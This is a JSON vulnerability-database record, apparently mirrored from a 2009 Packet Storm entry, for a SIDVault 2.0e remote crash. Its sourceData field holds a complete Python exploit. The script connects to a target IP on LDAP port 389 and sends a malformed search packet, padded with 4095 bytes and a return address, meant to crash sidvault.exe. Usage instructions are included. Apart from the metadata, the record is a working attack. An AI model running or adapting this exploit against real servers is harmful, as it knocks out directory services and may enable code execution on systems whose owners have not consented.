{"id": "PACKETSTORM:81273", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SIDVault 2.0e Crash", "description": "", "published": "2009-09-15T00:00:00", "modified": "2009-09-15T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/81273/SIDVault-2.0e-Crash.html", "reporter": "asheesh anaconda", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:27:25", "viewCount": 10, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/81273/sidvault20evista-crash.txt", "sourceData": "`#!/usr/bin/python \n \n# \n# $ ./ldap.py <target IP> \n# \n# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe ) \n# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3 \n# Coded by:asheesh anaconda \n# Discovery: Joxean Koret \n# Group DarkShinners \n \n \nimport sys \nimport socket \n \naddr = \"\\x33\\xbf\\x96\\x7c\" \nhealthpacket = '\\x41'*4095 + addr \nevilpacket = '0\\x82\\x10/\\x02\\x01\\x01c\\x82\\x10(\\x04\\x82\\x10\\x06dc=' \nevilpacket += healthpacket \nevilpacket += '\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00' \nprint \"[+] Sending evil packet\" \nprint \"[+] Wait ladp is getting crashh!!!!!!!!!!!!\" \n \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1], 389)) \ns.send(evilpacket) \ns.close() \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645459425, "score": 1659770509}}
{}